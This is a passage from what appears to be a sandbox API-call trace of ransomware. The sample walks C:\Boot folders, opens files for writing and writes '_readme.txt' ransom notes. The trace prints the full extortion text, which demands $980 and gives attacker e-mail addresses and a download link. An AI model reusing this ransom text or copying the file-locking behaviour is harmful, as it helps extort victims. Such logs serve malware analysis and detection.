out: hHeap=0xcd0000) returned 1 [0166.000] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.000] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.000] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.000] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.000] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.000] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.000] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.000] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.000] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.000] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.000] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.000] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.000] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.000] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.000] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.000] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.000] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.000] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.000] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.000] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.000] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.000] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.000] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.000] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0166.000] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.000] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.000] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.000] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.000] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.001] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.001] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.001] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.001] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0166.001] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.001] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.001] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.001] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0166.001] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.001] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.001] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.001] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.001] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.001] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.001] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.001] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.001] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.001] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.001] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.001] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.001] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0166.001] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.001] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.001] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.001] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.001] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0166.001] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.001] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.001] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.001] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.001] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.001] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.001] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.001] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.001] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.001] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.002] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.002] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.002] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.002] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.002] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.002] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.002] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.002] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.002] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.002] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.002] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.002] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.002] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.002] PathFindFileNameW (pszPath="C:\\Boot\\nb-NO\\") returned="nb-NO\\" [0166.002] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.002] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.002] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0166.002] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.002] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0166.002] PathFindFileNameW (pszPath="") returned="" [0166.002] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.002] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0166.003] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0166.003] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x800) returned 0x3b40090 [0166.003] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0166.003] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b19640 [0166.003] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.003] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.003] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.003] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.003] FreeLibrary (hLibModule=0x759d0000) returned 1 [0166.003] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.003] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.003] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.003] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.003] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x81c) returned 0x3b19640 [0166.003] PathAppendW (in: pszPath="C:\\Boot\\nb-NO\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 1 [0166.003] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.003] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.003] PathFileExistsW (pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 0 [0166.004] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b47e70 [0166.004] lstrcpyW (in: lpString1=0x3b47e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0166.004] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0166.004] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0166.004] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\_readme.txt" (normalized: "c:\\boot\\nb-no\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0166.004] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0166.004] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b47e70 | out: hHeap=0xcd0000) returned 1 [0166.004] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.004] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.004] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0166.004] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.004] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0166.004] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0166.004] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.004] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44e88 [0166.004] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.005] PathFindExtensionW (pszPath="C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned=".mui" [0166.005] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0166.005] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e88 | out: hHeap=0xcd0000) returned 1 [0166.005] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0166.005] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0166.005] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.005] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c908 | out: hHeap=0xcd0000) returned 1 [0166.005] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0166.005] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c908 [0166.005] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0166.006] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.006] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.006] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.006] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.006] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.006] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.006] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.006] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.006] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.006] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.006] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.006] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.006] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.006] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.006] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.006] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.006] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.006] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.006] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.006] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.006] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.006] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0166.006] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.006] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.006] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.007] PathFindFileNameW (pszPath="C:\\Boot\\nl-NL\\") returned="nl-NL\\" [0166.007] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0166.007] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.007] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0166.007] PathFindFileNameW (pszPath="") returned="" [0166.007] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0166.008] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0166.008] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0166.008] FreeLibrary (hLibModule=0x759d0000) returned 1 [0166.008] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.008] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.008] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.008] PathAppendW (in: pszPath="C:\\Boot\\nl-NL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 1 [0166.008] PathFileExistsW (pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 0 [0166.009] lstrcpyW (in: lpString1=0x3b47e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if 